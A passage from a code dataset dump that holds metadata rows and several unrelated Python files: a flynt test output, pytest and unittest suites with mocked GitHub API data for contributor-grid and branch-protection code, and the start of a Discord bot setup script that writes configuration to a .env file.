] | 118 | 2019-07-03T12:26:39.000Z | 2022-03-06T22:40:17.000Z | test/integration/expected_out_single_line/percent_strings.py | Inveracity/flynt | b975b6f61893d5db1114d68fbb5d212c4e11aeb8 | [
"MIT"
] | 25 | 2019-07-10T08:39:58.000Z | 2022-03-03T14:44:15.000Z | a = 'abra'
print(f'{a!r} {a} {a!a}')
| 7.8 | 25 | 0.410256 | 9 | 39 | 1.777778 | 0.555556 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 39 | 4 | 26 | 9.75 | 0.516129 | 0 | 0 | 0 | 0 | 0 | 0.513514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d1eca4c564425fc8b8a68d75db8fb43554b66660 | 22,738 | py | Python | content-repo/get_top_contrib_test.py | marcellarichmond/content-docs | b3e1c9ac4cf34e7ffa51775c253231b30692e03c | [
"MIT"
] | 24 | 2019-12-05T20:22:50.000Z | 2022-02-24T14:54:03.000Z | content-repo/get_top_contrib_test.py | marcellarichmond/content-docs | b3e1c9ac4cf34e7ffa51775c253231b30692e03c | [
"MIT"
] | 901 | 2019-12-05T16:07:04.000Z | 2022-03-31T13:39:26.000Z | content-repo/get_top_contrib_test.py | marcellarichmond/content-docs | b3e1c9ac4cf34e7ffa51775c253231b30692e03c | [
"MIT"
] | 39 | 2019-12-05T15:52:34.000Z | 2022-02-24T14:54:06.000Z |
from gen_top_contrib import get_external_prs, get_contributors_users, get_github_user, create_grid
INNER_PR_RESPONSE = [{
"url": "https://api.github.com/repos/demisto/content/pulls/13801",
"id": 694456100,
"node_id": "MDExOlB1bGxSZXF1ZXN0Njk0NDU2MTAw",
"html_url": "https://github.com/demisto/content/pull/13801",
"issue_url": "https://api.github.com/repos/demisto/content/issues/13801",
"number": 13801,
"state": "closed",
"locked": False,
"title": "Test PR",
"user": {
"login": "powershelly",
"id": 87646651,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"received_events_url": "https://api.github.com/users/powershelly/received_events",
"type": "User",
"site_admin": False
},
"body": "## Status\r\n- [ ] In Progress\r\n- [x] Ready\r\n- [ ] In Hold - (Reason for hold)",
"created_at": "2021-07-21T14:56:40Z",
"updated_at": "2021-07-25T12:58:30Z",
"closed_at": "2021-07-25T12:58:30Z",
"merged_at": "2021-07-25T12:58:30Z",
"merge_commit_sha": "4c5ea28581b084f5ee7bb4847a2df4c2c111111d",
"assignee": {
"login": "testUser",
"id": 986532147,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"subscriptions_url": "https://api.github.com/users/testUser/subscriptions",
"organizations_url": "https://api.github.com/users/testUser/orgs",
"repos_url": "https://api.github.com/users/testUser/repos",
"type": "User",
"site_admin": False
},
"assignees": [
{
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"type": "User",
"site_admin": False
}
],
"commits_url": "https://api.github.com/repos/demisto/content/pulls/13801/commits",
"head": {
"label": "powershelly:fix_task_run_full_action_report",
"ref": "fix_task_run_full_action_report",
"sha": "df2219695109f309ac7a7cce1d84b6fd4c222222",
"user": {
"login": "powershelly",
"id": 87646651,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"followers_url": "https://api.github.com/users/powershelly/followers",
"type": "User",
"site_admin": False
},
"repo": {
"id": 123456789,
"node_id": "MDEwOlJlcG9zaXRvcnkzODc0Mjk1MzM=",
"name": "content",
"full_name": "powershelly/content",
"private": False,
"owner": {
"login": "powershelly",
"id": 123456,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"gravatar_id": "",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"type": "User",
"site_admin": False
},
"html_url": "https://github.com/powershelly/content",
"description": "Demisto is now Cortex XSOAR. Automate and orchestrate your Security "
"Operations with Cortex XSOAR's ever-growing Content Repository. "
"Pull Requests are always welcome and highly appreciated! ",
"fork": False,
"url": "https://api.github.com/repos/powershelly/content",
"forks_url": "https://api.github.com/repos/powershelly/content/forks",
"created_at": "2021-07-19T10:45:06Z",
"updated_at": "2021-07-19T10:45:07Z",
"pushed_at": "2021-07-25T12:26:44Z",
"git_url": "git://github.com/powershelly/content.git",
"ssh_url": "git@github.com:powershelly/content.git",
"clone_url": "https://github.com/powershelly/content.git",
"svn_url": "https://github.com/powershelly/content",
"homepage": "https://xsoar.pan.dev/",
"default_branch": "master"
}
},
"base": {
"label": "demisto:contrib/powershelly_fix_task_run_full_action_report",
"ref": "contrib/powershelly_fix_task_run_full_action_report",
"sha": "36f065eab202be6888a5ff208b1a47159af771be",
"user": {
"login": "demisto",
"id": 2345678,
"node_id": "MDEyOk9yZ2FuaXphdGlvbjExMDExNzY3",
"avatar_url": "https://avatars.githubusercontent.com/u/11011767?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/demisto",
"html_url": "https://github.com/demisto",
"followers_url": "https://api.github.com/users/demisto/followers",
"type": "Organization",
"site_admin": False
},
"repo": {
"id": 123456,
"node_id": "MDEwOlJlcG9zaXRvcnk2MDUyNTM5Mg==",
"name": "content",
"full_name": "demisto/content",
"private": False,
"owner": {
"login": "demisto",
"id": 1234123456,
"node_id": "MDEyOk9yZ2FuaXphdGlvbjExMDExNzY3",
"avatar_url": "https://avatars.githubusercontent.com/u/11011767?v=4",
"url": "https://api.github.com/users/demisto",
"html_url": "https://github.com/demisto",
"type": "Organization",
"site_admin": False
},
"html_url": "https://github.com/demisto/content",
"description": "Demisto is now Cortex XSOAR. Automate and orchestrate your Security Operations with "
"Cortex XSOAR's ever-growing Content Repository. "
"Pull Requests are always welcome and highly appreciated! ",
"fork": False,
"url": "https://api.github.com/repos/demisto/content",
"created_at": "2016-06-06T12:17:02Z",
"updated_at": "2021-07-25T16:13:16Z",
"pushed_at": "2021-07-25T18:59:42Z",
"homepage": "https://xsoar.pan.dev/",
"forks": 744,
"open_issues": 122,
"watchers": 661,
"default_branch": "master"
}
},
"author_association": "CONTRIBUTOR",
"merged": True,
"merged_by": {
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"type": "User",
"site_admin": False
}
}]
def test_get_contrib_prs():
"""
Given:
- Mock response data - list of external prs.
When:
- running the get_contrib_prs function
Then:
- Validate that the inner pr numbers returns.
"""
mock_response = [
{
"url": "https://api.github.com/repos/demisto/content/issues/13834",
"html_url": "https://github.com/demisto/content/pull/13834",
"id": 952269617,
"node_id": "MDExOlB1bGxSZXF1ZXN0Njk2NDk4MDM3",
"number": 13834,
"title": "Test PR",
"user": {
"login": "content-bot",
"id": 55035720,
"node_id": "MDQ6VXNlcjU1MDM1NzIw",
"avatar_url": "https://avatars.githubusercontent.com/u/55035720?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/content-bot",
"html_url": "https://github.com/content-bot",
"followers_url": "https://api.github.com/users/content-bot/followers",
"following_url": "https://api.github.com/users/content-bot/following{/other_user}",
"gists_url": "https://api.github.com/users/content-bot/gists{/gist_id}",
"starred_url": "https://api.github.com/users/content-bot/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/content-bot/subscriptions",
"organizations_url": "https://api.github.com/users/content-bot/orgs",
"repos_url": "https://api.github.com/users/content-bot/repos",
"events_url": "https://api.github.com/users/content-bot/events{/privacy}",
"received_events_url": "https://api.github.com/users/content-bot/received_events",
"type": "User",
"site_admin": False
},
"state": "closed",
"locked": False,
"assignee": {
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"followers_url": "https://api.github.com/users/testUser/followers",
"following_url": "https://api.github.com/users/testUser/following{/other_user}",
"gists_url": "https://api.github.com/users/testUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/testUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/testUser/subscriptions",
"organizations_url": "https://api.github.com/users/testUser/orgs",
"repos_url": "https://api.github.com/users/testUser/repos",
"events_url": "https://api.github.com/users/testUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/testUser/received_events",
"type": "User",
"site_admin": False
},
"assignees": [
{
"login": "testUser",
"id": 59408745,
"node_id": "MDQ6VXNlcjU5NDA4NzQ1",
"avatar_url": "https://avatars.githubusercontent.com/u/59408745?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/testUser",
"html_url": "https://github.com/testUser",
"followers_url": "https://api.github.com/users/testUser/followers",
"following_url": "https://api.github.com/users/testUser/following{/other_user}",
"gists_url": "https://api.github.com/users/testUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/testUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/testUser/subscriptions",
"organizations_url": "https://api.github.com/users/testUser/orgs",
"repos_url": "https://api.github.com/users/testUser/repos",
"events_url": "https://api.github.com/users/testUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/testUser/received_events",
"type": "User",
"site_admin": False
}
],
"milestone": "None",
"comments": 0,
"created_at": "2021-07-25T12:59:32Z",
"updated_at": "2021-07-25T16:13:12Z",
"closed_at": "2021-07-25T16:13:11Z",
"author_association": "MEMBER",
"active_lock_reason": "None",
"draft": False,
"pull_request": {
"url": "https://api.github.com/repos/demisto/content/pulls/13834",
"html_url": "https://github.com/demisto/content/pull/13834",
"diff_url": "https://github.com/demisto/content/pull/13834.diff",
"patch_url": "https://github.com/demisto/content/pull/13834.patch"
},
"body": "## Original External PR\r\n[external pull request](https://github.com/demisto/content/pull/13801)"
"\r\n\r\n## Status\r\n- [ ] In Progress\r\n- [x] Ready\r\n- [ ] In Hold - (Reason for hold)\r\n\r\n"
},
{
"url": "https://api.github.com/repos/demisto/content/issues/13829",
"repository_url": "https://api.github.com/repos/demisto/content",
"labels_url": "https://api.github.com/repos/demisto/content/issues/13829/labels{/name}",
"comments_url": "https://api.github.com/repos/demisto/content/issues/13829/comments",
"events_url": "https://api.github.com/repos/demisto/content/issues/13829/events",
"html_url": "https://github.com/demisto/content/pull/13829",
"id": 952208287,
"node_id": "MDExOlB1bGxSZXF1ZXN0Njk2NDUxMTE1",
"number": 13829,
"title": "Another test PR",
"user": {
"login": "content-bot",
"id": 55035720,
"node_id": "MDQ6VXNlcjU1MDM1NzIw",
"avatar_url": "https://avatars.githubusercontent.com/u/55035720?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/content-bot",
"html_url": "https://github.com/content-bot",
"followers_url": "https://api.github.com/users/content-bot/followers",
"following_url": "https://api.github.com/users/content-bot/following{/other_user}",
"gists_url": "https://api.github.com/users/content-bot/gists{/gist_id}",
"starred_url": "https://api.github.com/users/content-bot/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/content-bot/subscriptions",
"organizations_url": "https://api.github.com/users/content-bot/orgs",
"repos_url": "https://api.github.com/users/content-bot/repos",
"events_url": "https://api.github.com/users/content-bot/events{/privacy}",
"received_events_url": "https://api.github.com/users/content-bot/received_events",
"type": "User",
"site_admin": False
},
"state": "closed",
"locked": False,
"assignee": {
"login": "TestUser",
"id": 70005542,
"node_id": "MDQ6VXNlcjcwMDA1NTQy",
"avatar_url": "https://avatars.githubusercontent.com/u/70005542?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/TestUser",
"html_url": "https://github.com/TestUser",
"followers_url": "https://api.github.com/users/TestUser/followers",
"following_url": "https://api.github.com/users/TestUser/following{/other_user}",
"gists_url": "https://api.github.com/users/TestUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/TestUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/TestUser/subscriptions",
"organizations_url": "https://api.github.com/users/TestUser/orgs",
"repos_url": "https://api.github.com/users/TestUser/repos",
"events_url": "https://api.github.com/users/TestUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/TestUser/received_events",
"type": "User",
"site_admin": False
},
"assignees": [
{
"login": "TestUser",
"id": 70005542,
"node_id": "MDQ6VXNlcjcwMDA1NTQy",
"avatar_url": "https://avatars.githubusercontent.com/u/70005542?v=4",
"gravatar_id": "",
"url": "https://api.github.com/users/TestUser",
"html_url": "https://github.com/TestUser",
"followers_url": "https://api.github.com/users/TestUser/followers",
"following_url": "https://api.github.com/users/TestUser/following{/other_user}",
"gists_url": "https://api.github.com/users/TestUser/gists{/gist_id}",
"starred_url": "https://api.github.com/users/TestUser/starred{/owner}{/repo}",
"subscriptions_url": "https://api.github.com/users/TestUser/subscriptions",
"organizations_url": "https://api.github.com/users/TestUser/orgs",
"repos_url": "https://api.github.com/users/TestUser/repos",
"events_url": "https://api.github.com/users/TestUser/events{/privacy}",
"received_events_url": "https://api.github.com/users/TestUser/received_events",
"type": "User",
"site_admin": False
}
],
"milestone": "None",
"comments": 0,
"created_at": "2021-07-25T06:31:57Z",
"updated_at": "2021-07-25T12:19:42Z",
"closed_at": "2021-07-25T12:19:42Z",
"author_association": "MEMBER",
"active_lock_reason": "None",
"draft": False,
"pull_request": {
"url": "https://api.github.com/repos/demisto/content/pulls/13829",
"html_url": "https://github.com/demisto/content/pull/13829",
"diff_url": "https://github.com/demisto/content/pull/13829.diff",
"patch_url": "https://github.com/demisto/content/pull/13829.patch"
},
"body": "## Original External PR\r\n[external pull request](https://github.com/demisto/content/pull/13614)"
"\r\n\r\n## Contributing to Cortex XSOAR Content",
}
]
res = get_external_prs(mock_response)
expected_output = [{'pr_number': '13801',
'pr_body': '## Original External PR\r\n[external pull request]'
'(https://github.com/demisto/content/pull/13801)\r\n\r\n## Status\r\n- [ ] In '
'Progress\r\n- [x] Ready\r\n- [ ] In Hold - (Reason for hold)\r\n\r\n'},
{'pr_number': '13614', 'pr_body': '## Original External PR\r\n[external pull request]'
'(https://github.com/demisto/content/pull/13614)\r\n\r\n## '
'Contributing to Cortex XSOAR Content'}]
assert expected_output == res
def test_get_github_user(requests_mock):
"""
Given:
- http response from get_user call to github.
When:
- running the get_github_user function
Then:
- Validate that a tuple of the user avatar and profile returned.
"""
user_response = {
"login": "jacksparow",
"id": 987654,
"node_id": "MDQ6VXNlcjQ3MTE2MzM=",
"avatar_url": "https://avatars.githubusercontent.com/u/4711633?v=4",
"url": "https://api.github.com/users/jacksparow",
"html_url": "https://github.com/jacksparow",
"followers_url": "https://api.github.com/users/jacksparow/followers",
"organizations_url": "https://api.github.com/users/jacksparow/orgs",
"repos_url": "https://api.github.com/users/jacksparow/repos",
"events_url": "https://api.github.com/users/jacksparow/events{/privacy}",
"received_events_url": "https://api.github.com/users/jacksparow/received_events",
"type": "User",
"site_admin": False,
"name": "Jack Sparow",
"location": "Tel Aviv, Israel",
"hireable": True,
"bio": "Hello World️",
"public_repos": 70,
"followers": 16,
"following": 12,
"created_at": "2013-06-16T15:42:41Z",
"updated_at": "2021-07-17T20:25:39Z"
}
username = 'jacksparow'
requests_mock.get(f'https://api.github.com/users/{username}', json=user_response)
res = get_github_user(username)
assert user_response == res
def test_get_contribution_users():
"""
Given:
- Mock response data - inner PR response.
When:
- running the get_contributors_users function
Then:
- Validate that contribution user was returned as necessary.
"""
user_info = [{
"login": "powershelly",
"id": 87646651,
"node_id": "MDQ6VXNlcjg3NjQ2NjUx",
"avatar_url": "https://avatars.githubusercontent.com/u/testurl",
"url": "https://api.github.com/users/powershelly",
"html_url": "https://github.com/powershelly",
"received_events_url": "https://api.github.com/users/powershelly/received_events",
"type": "User",
"site_admin": False
}]
res = get_contributors_users(user_info)
assert ["<img src='https://avatars.githubusercontent.com/u/testurl'/><br></br> "
"<a href='https://github.com/powershelly' target='_blank'>powershelly</a><br></br>1 Contributions"] == res
def test_create_grid():
"""
Given:
- List of users as data to create the table from.
When:
- running the create_grid function
Then:
- Validate that the table was created successfully.
"""
response = [
"<img src='https://avatars.githubusercontent.com/u/testurl'/><br></br> " +
"<a href='https://github.com/powershelly' target='_blank'>powershelly</a><br></br>5 Contributions",
"<img src='https://avatars.githubusercontent.com/u/jacksparow'/><br></br> " +
"<a href='https://github.com/powershelly' target='_blank'>jacksparow</a><br></br>8 Contributions"
]
res = create_grid(response)
expected = "<tr>\n<td><img src='https://avatars.githubusercontent.com/u/testurl'/><br></br> " \
"<a href='https://github.com/powershelly' target='_blank'>powershelly</a><br></br>5 Contributions </td>"
assert expected in res
| 48.481876 | 120 | 0.554358 | 2,374 | 22,738 | 5.179023 | 0.125105 | 0.091745 | 0.110451 | 0.13412 | 0.81952 | 0.788532 | 0.770557 | 0.735502 | 0.700529 | 0.66466 | 0 | 0.051168 | 0.280588 | 22,738 | 468 | 121 | 48.58547 | 0.700391 | 0.030654 | 0 | 0.589372 | 0 | 0.031401 | 0.59664 | 0.035105 | 0 | 0 | 0 | 0 | 0.009662 | 1 | 0.009662 | false | 0 | 0.002415 | 0 | 0.012077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae254a9a428032b76283dfc054baf7d061188d87 | 11,220 | py | Python | tests/lib/workflow/test_init.py | ChauffeurPrive/nestor-api | 364b5f034eeb929932a5a8c3f3b00d1275a7ae5b | [
"Apache-2.0"
] | 2 | 2020-08-17T09:59:03.000Z | 2020-08-17T09:59:23.000Z | tests/lib/workflow/test_init.py | ChauffeurPrive/nestor-api | 364b5f034eeb929932a5a8c3f3b00d1275a7ae5b | [
"Apache-2.0"
] | 83 | 2020-06-12T14:37:35.000Z | 2022-01-26T14:10:10.000Z | tests/lib/workflow/test_init.py | ChauffeurPrive/nestor-api | 364b5f034eeb929932a5a8c3f3b00d1275a7ae5b | [
"Apache-2.0"
] | 1 | 2020-07-02T14:33:45.000Z | 2020-07-02T14:33:45.000Z | from unittest import TestCase
from unittest.mock import MagicMock, create_autospec, patch
from github import AuthenticatedUser, Branch
from nestor_api.adapters.git.abstract_git_provider import (
AbstractGitProvider,
GitProviderError,
GitResource,
GitResourceNotFoundError,
)
from nestor_api.lib.workflow.init import (
_create_and_protect_branch,
_get_workflow_branches,
init_workflow,
)
from nestor_api.lib.workflow.typings import WorkflowInitStatus
class TestWorkflow(TestCase):
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
@patch("nestor_api.lib.workflow.init._create_and_protect_branch", autospec=True)
def test_init_workflow(
self, _create_and_protect_branch_mock, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should correctly initialize all branches."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {
"workflow": ["integration", "staging", "production"]
}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
user = MagicMock(spec=AuthenticatedUser.AuthenticatedUser)
user.login = "some-user-login"
git_provider_mock.get_user_info.return_value = user
master_branch = MagicMock(spec=Branch.Branch)
master_branch.commit.sha = "5ac5ee8"
git_provider_mock.get_branch.return_value = master_branch
_create_and_protect_branch_mock.side_effect = [
{"created": (True, True), "protected": (True, True)},
{"created": (False, True), "protected": (True, True)},
{"created": (False, True), "protected": (False, True)},
]
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
git_provider_mock.get_branch.assert_called_with("organization", "app-1", "master")
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(
result,
(
WorkflowInitStatus.SUCCESS,
{
"integration": {"created": (True, True), "protected": (True, True)},
"staging": {"created": (False, True), "protected": (True, True)},
"production": {"created": (False, True), "protected": (False, True)},
},
),
)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
@patch("nestor_api.lib.workflow.init._create_and_protect_branch", autospec=True)
def test_init_workflow_without_master_branch(
self, _create_and_protect_branch_mock, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should return fail status and empty report."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {
"workflow": ["integration", "staging", "production"]
}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
user = MagicMock(spec=AuthenticatedUser.AuthenticatedUser)
user.login = "some-user-login"
git_provider_mock.get_user_info.return_value = user
git_provider_mock.get_branch.side_effect = GitResourceNotFoundError(GitResource.BRANCH)
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
_create_and_protect_branch_mock.assert_not_called()
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(
result, (WorkflowInitStatus.FAIL, {},),
)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
@patch("nestor_api.lib.workflow.init._create_and_protect_branch", autospec=True)
def test_init_workflow_failing_to_create_or_protect_branch(
self, _create_and_protect_branch_mock, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should return failed report if something goes wrong when
creating/protecting branches."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {
"workflow": ["integration", "staging", "production"]
}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
user = MagicMock(spec=AuthenticatedUser.AuthenticatedUser)
user.login = "some-user-login"
git_provider_mock.get_user_info.return_value = user
master_branch = MagicMock(spec=Branch.Branch)
master_branch.commit.sha = "5ac5ee8"
git_provider_mock.get_branch.return_value = master_branch
_create_and_protect_branch_mock.side_effect = GitProviderError("error")
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
git_provider_mock.get_branch.assert_called_with("organization", "app-1", "master")
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(
result, (WorkflowInitStatus.FAIL, {},),
)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
@patch("nestor_api.lib.workflow.init.non_blocking_clean", autospec=True)
@patch("nestor_api.lib.workflow.init.config", autospec=True)
def test_init_workflow_without_configured_workflow(
self, config_mock, non_blocking_clean_mock, _logger_mock
):
"""Should create no branch."""
# Mocks
config_mock.create_temporary_config_copy.return_value = "fake-path"
config_mock.get_app_config.return_value = {}
git_provider_mock = create_autospec(spec=AbstractGitProvider)
# Test
result = init_workflow("organization", "app-1", git_provider_mock)
# Assertions
git_provider_mock.get_user_info.assert_not_called()
git_provider_mock.get_branch.assert_not_called()
git_provider_mock.create_branch.assert_not_called()
git_provider_mock.protect_branch.assert_not_called()
non_blocking_clean_mock.assert_called_with("fake-path")
self.assertEqual(result, (WorkflowInitStatus.SUCCESS, {}))
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_non_existing_branch(self, _logger_mock):
"""Should create and protect branch."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
git_provider_mock.get_branch.side_effect = GitResourceNotFoundError(GitResource.BRANCH)
branch = MagicMock(spec=Branch.Branch)
branch.protected = False
git_provider_mock.create_branch.return_value = branch
# Test
result = _create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
git_provider_mock.get_branch.assert_called_once_with("organization", "app-1", "staging")
git_provider_mock.create_branch.assert_called_once_with(
"organization", "app-1", "staging", "5ac5ee8"
)
git_provider_mock.protect_branch.assert_called_once_with(
"organization", "app-1", "staging", "some-user-login"
)
self.assertEqual(result, {"created": (True, True), "protected": (True, True)})
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_non_existing_repo(self, _logger_mock):
"""Should raise an error."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
git_provider_mock.get_branch.side_effect = GitResourceNotFoundError(GitResource.REPOSITORY)
# Test
with self.assertRaises(GitResourceNotFoundError) as context:
_create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
self.assertEqual(context.exception.resource, GitResource.REPOSITORY)
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_existing_protected_branch(self, _logger_mock):
"""Should not modify branch."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
staging_branch = MagicMock(spec=Branch.Branch)
staging_branch.protected = True
git_provider_mock.get_branch.return_value = staging_branch
# Test
result = _create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
git_provider_mock.get_branch.assert_called_once_with("organization", "app-1", "staging")
git_provider_mock.create_branch.assert_not_called()
git_provider_mock.protect_branch.assert_not_called()
self.assertEqual(result, {"created": (False, True), "protected": (False, True)})
@patch("nestor_api.lib.workflow.init.Logger", autospec=True)
def test_create_and_protect_branch_with_existing_unprotected_branch(self, _logger_mock):
"""Should only protect the branch."""
# Mocks
git_provider_mock = create_autospec(spec=AbstractGitProvider)
staging_branch = MagicMock(spec=Branch.Branch)
staging_branch.protected = False
git_provider_mock.get_branch.return_value = staging_branch
# Test
result = _create_and_protect_branch(
"organization", "app-1", "staging", "5ac5ee8", "some-user-login", git_provider_mock
)
# Assertions
git_provider_mock.get_branch.assert_called_once_with("organization", "app-1", "staging")
git_provider_mock.create_branch.assert_not_called()
git_provider_mock.protect_branch.assert_called_once_with(
"organization", "app-1", "staging", "some-user-login"
)
self.assertEqual(result, {"created": (False, True), "protected": (True, True)})
def test_get_workflow_branches(self):
"""Should return the list of workflow branches."""
fake_config = {"workflow": ["integration", "staging", "master"]}
result = _get_workflow_branches(fake_config, "master")
self.assertEqual(result, ["integration", "staging"])
def test_get_workflow_branches_with_empty_config(self):
"""Should return an empty list."""
result = _get_workflow_branches({}, "master")
self.assertEqual(result, [])
def test_get_workflow_branches_with_empty_workflow(self):
"""Should return an empty list."""
result = _get_workflow_branches({"workflow": []}, "master")
self.assertEqual(result, [])
| 44.701195 | 99 | 0.688948 | 1,263 | 11,220 | 5.760887 | 0.092637 | 0.065008 | 0.086586 | 0.057724 | 0.857064 | 0.825179 | 0.798378 | 0.768829 | 0.757971 | 0.745739 | 0 | 0.004138 | 0.203119 | 11,220 | 250 | 100 | 44.88 | 0.809641 | 0.052763 | 0 | 0.558011 | 0 | 0 | 0.165449 | 0.073333 | 0 | 0 | 0 | 0 | 0.176796 | 1 | 0.060773 | false | 0 | 0.033149 | 0 | 0.099448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae3cb240c9c5d03df3970047b95d95c471c1713e | 6,054 | py | Python | setup.py | NeilDevelopment/BeepBoopBot | 1ad7d987a7f27b2585d58d6d4d3a6257c5f4ab82 | [
"MIT"
] | null | null | null | setup.py | NeilDevelopment/BeepBoopBot | 1ad7d987a7f27b2585d58d6d4d3a6257c5f4ab82 | [
"MIT"
] | 2 | 2022-03-28T07:57:18.000Z | 2022-03-28T08:42:16.000Z | setup.py | NeilDevelopment/BeepBoopBot | 1ad7d987a7f27b2585d58d6d4d3a6257c5f4ab82 | [
"MIT"
] | null | null | null | import time
import os
def setup():
print("\n")
token = input("Please enter your Bot token\n")
prefix = input("Please enter your Bot prefix\n")
member = input("Please enter your Member role ID\n")
mod = input("Please enter your Moderator role ID\n")
admin = input("Please enter your Admin role ID\n")
guild = input("Please enter your Guild ID\n")
log_channel = input("Please enter the channel ID for logs. (If you do not want to enable logs please press ENTER)\n")
print("\n\n")
print("Confirm with these values.")
time.sleep(2)
print(f"Token: {token}")
print(f"Prefix: {prefix}")
print(f"Member Role ID: {member}")
print(f"Moderator Role ID: {mod}")
print(f"Admin Role ID: {admin}")
print(f"Guild ID: {guild}")
print(f"Log Channel ID: {log_channel}")
info_recheck = input("Is that information correct? [Y/N]\n")
if info_recheck == "Y" or info_recheck == "y":
print("Please wait while the bot is being setup.")
with open(".env", "w") as env:
env.write(f"TOKEN={token}" + "\n")
env.write(f"PREFIX={prefix}" + "\n")
env.write(f"MEMBER_ROLE={member}" + "\n")
env.write(f"MODERATOR_ROLE={mod}" + "\n")
env.write(f"ADMIN_ROLE={admin}" + "\n")
